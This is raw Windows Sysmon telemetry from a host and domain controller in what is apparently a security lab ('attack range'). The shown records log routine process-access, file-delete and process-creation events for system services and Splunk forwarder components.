10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:43.326{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:44.147{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BCABF98E7F5DE44ABAC9BA54E80A475,SHA256=11873D616D9E5938AF98AFEF3ABA4A4BDDBEDED9D24B4D2D0280C410696A60D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:44.310{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D38966BB4F35BAA71F0033C56500009,SHA256=D680DC52220A7D09A3E97D470CFE0D4AABA306223E101534A168EF0BFB11E950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.913{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.897{4F8D34B0-1095-6216-3C04-000000003902}37922748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1095-6216-3C04-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1095-6216-3C04-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.710{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1095-6216-3C04-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.711{4F8D34B0-1095-6216-3C04-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000215910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1095-6216-3B04-000000003902}2544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:45.210{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 